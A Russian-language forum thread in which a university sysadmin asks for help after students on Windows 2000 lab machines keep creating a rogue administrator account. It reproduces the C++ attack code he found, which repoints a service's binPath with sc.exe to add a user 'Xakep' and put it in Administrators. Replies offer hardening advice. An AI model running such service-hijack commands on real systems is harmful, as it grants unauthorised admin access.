Взломали при помощи C++ и SC.ехе - Компьютерный форум OSzone.net

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)

- Защита компьютерных систем (http://forum.oszone.net/forumdisplay.php?f=20)

- - Взломали при помощи C++ и SC.ехе (http://forum.oszone.net/showthread.php?t=99290)

Взломали при помощи C++ и SC.ехе

Привет всем.
Сразу прошу прошение за ошибки (не из России я).
Такая проблема у миня, я СисАдмин в Университете (администрираю 40 комп. OS : Win 2000 Pro (all hotfixes))
В прошом году меня тоже взломали, уже не знал чо делать, но нечаина на один компютар нашол утилиты : sc.exe и Service Permissions Checker.
Вот што они делали :

После того как удалил всё, вот што показовала :

Карочи, удалил я Macromedia Licensing.exe, и Сервис тоже удалил в регедит, думал што всё теперь проблем больше не будет, не тут то было.
Согодня опять спалил новыи Юзер "Хакер", и на Диск Д: нашол код зделан в С++.

Код:

// sys.cpp : Defines the entry point for the console application.

//



#include "stdafx.h"

#include <stdlib.h>

#include <windows.h>

#include <conio.h>

int main(int argc, char* argv[])

{

//        WinExec("sc.exe queryex \"Macromedia Licensing Services\" > d:\\log.log.log",SW_SHOW);

        WinExec("sc.exe config \"Macromedia Licensing Service\" binPath= \"net user Xakep Xakep /add\"",SW_SHOW);

        Sleep(1000);

        WinExec("sc.exe start \"Macromedia Licensing Service\"",SW_SHOW);

        Sleep(1000);

        WinExec("sc.exe config \"Macromedia Licensing Service\" binPath= \"net localuser Administrators Xakep /add\"",SW_SHOW);

        Sleep(1000);

        WinExec("sc.exe start \"Macromedia Licensing Service\"",SW_SHOW);

        getch();

        return 0;

}

..и ищо несколько фаилов, вылажу на рапид штоб посмотрели:
http://rapidshare.com/files/87310556/sys.rar.html

В моём зале много програм есть в том числе и Visual Studio ну конечно есть и cmd.exe
Все студенты работают под User - Restricted user.
С: - read & Execute, в regedit тоже самое, и в Group Policy по игрался.

Не понемаю как они создают новыи Сервис в регедит, User имеет права толыко читать, есть предположение што они под Юзер : System делают ето.
Помогите пожалуиста, не знаю уже што делать, спасибо аднозначно, жду ответов штоб решить проблему.

Забыл поставеть ищо один print screen :

Может быть имеет смысл sc delete Macromedia Licensing Service (доп. физически переместить exe файл, запускающий сервис) и запретить запуск cmd (тут), regedit

Цитата:

В разделе HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Windows\CurrentVerson\Policies\System добавить ключ DisableRegistryTools :dword= 0х00000001.
Запуск редактора реестра будет запрещен, но останется возможность вносит изменения с помощью программного обеспечения сторонних разработчиков и с помощью REG-файла.

Можно попробовать использовать сторонние утилиты, типа LockWin

1. Я службу Macromedia удалил сразу и .ехе филе тоже, он (хакер) сам саздаёт эту службу, и вовсе Flash-u и Dreamweaver-u не нужен этот сервис.

2. Не могу запретить cmd :( Юзера не могут работать в Assembler и Java, я запретил cmd сразу но потом когда увидел што студенты не могут работать и учителя начели наижеать, разрешил опять.

3. :) ну конечно Юузера не имеют доступа к regedit и regedt32.

Што задумал сегодня зделать :

Вовсе убрать SYSTEM и User-a с этова ключа:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

...веть вся проблема што хакер создаёт новыи Service, я думаю с помощю SYSTEM, не знаю што даст это, или вовсе Виндоза может здохнуть на Startup, тут уже методам тыка, пока не урежу уязвимость не угаманюсь.

Жду новые сообшения...

С помощью можно той же LockWin Система безопасного запуска программ из LockWin
Можно ещё ограничить через
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun
Реестр: Настройки безопасности - при использовании данного метода надо обязательно вписать в раздел RestrictRun программу regedit.exe или другую для работы с реестром. В противном случае Вы не сможете отключить данный параметр, и придется переустанавливать систему.
Дополнительно можно почитать How to implement system policies for Windows XP-based...

Не поиму Pili я же сказал што User не имеет доступ к regedit.
LockWin LockWin не подходит для меня, лудше уже поставеть Deep Freeze...но тоже не хочу, хочу наити уязбимость и убраты иё.

Цитата:

Цитата eXtremer

User не имеет доступ к regedit. »

при чем тут это? Я же писал о ограничении запуска программ

Цитата:

Цитата Pili

Можно ещё ограничить через
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun »

и какую програму ты хочеш ограничеть, не поиму ?!

eXtremer, я вообще никакую прогу не хочу ограничивать, мне это не надо :) Я привел выше ссылку по методу ограничения запуска программ
Реестр: Настройки безопасности, видимо ты по ней не сходил. Суть в том, чтобы разрешить запуск только определенных программ, всё остальное запретить.

Pili, видно ты не понемаеш што творится у миня в зале :)
Щас я перечеслю только несколыко програм которые есть в зале :
Microsoft Office, Oralce, MSSQL, Maple, Corel Draw, Photoshop, Macromedia, Visual Studio...и ищо много, много различных прогам,
так што што ты мне хочеш скзать НЕ выполнима !

Нет, нечево не получилось :( Много програм не рабатают, даже Symantec Anticirus не запускаетця...
пфффф не жаю больше чо делать...

Цитата:

Цитата eXtremer

Щас я перечеслю только несколыко програм которые есть в зале :
Microsoft Office, Oralce, MSSQL, Maple, Corel Draw, Photoshop, Macromedia, Visual Studio...и ищо много, много различных прогам,
так што што ты мне хочеш скзать НЕ выполнима ! »

Ну а что поделать, сложно всё прописывать, но выполнимо же )
Using Software Restriction Policies to Protect Against Unauthorized Software , можно закрутить гайки доп.-но применением шаблона hisecws.inf через оснастку Security Configuration and Analysis или использовать сторонный софт, позволяющий контролировать доступ... или что-то типа vmware

Усио решил поставлю Deep Freeze до выеснение апстаятельств...штоб не иб* много, в суботу поставлю.

Вчера сам сел на один комп. и начел игратся с sc.exe , нечего не получалось, не старт, не стоп, не create service - access denied, так што они уже наверое под Админом делают этот service.
И ищо што интересно, почему назывют этот сервис только Macromedia Licensing ?
есть два варината : 1. или называют так штоб я не сполил новыи созданыи сервис, либо 2. они могут создать толыко этот сервис!Надо както зделать штоб они не могли создать этот сервис, но как ? может бить сам его создать а потом убрать SYSTEM и User в regedt32 все права ?!

eXtremer, поменять пароль админа (можно и имя Administrator переименовать), провести аудит и снести всех других локальных админов (можно с помощью групп. политики тут). Можно дополнительно воспользоваться утилитой syskey How to use the SysKey utility to secure the Windows Security Accounts Manager database
Есть предположение что хакеры
а)повышают привилегии через уязвимости установленного софта, поэтому поставить все патчи на весь установленный софт
б)используют для своих нужд ранее внедренный backdoor/trojan, поэтому провести глубокий анализ всего софта всевозможными утилитами, включая антивирусные (AVZ, CureIT, SdFix, ComboFix)

Цитата:

Цитата eXtremer

назывют этот сервис только Macromedia Licensing »

Вероятно кто-то поломал один раз, все остальные действуют по шаблону, скорее всего сервис можно назвать как угодно (если это только не зашито в уже готовой используемой ими программе для взлома)
Кстати, можно попробовать дополнительно установить HIPS (типа processguard или лучше defencewall ) и закрыть HIPS паролем.

Скачал сегодня ProcessGuard 3.410, посталвю в субботу, но не знаю елси это штота даст...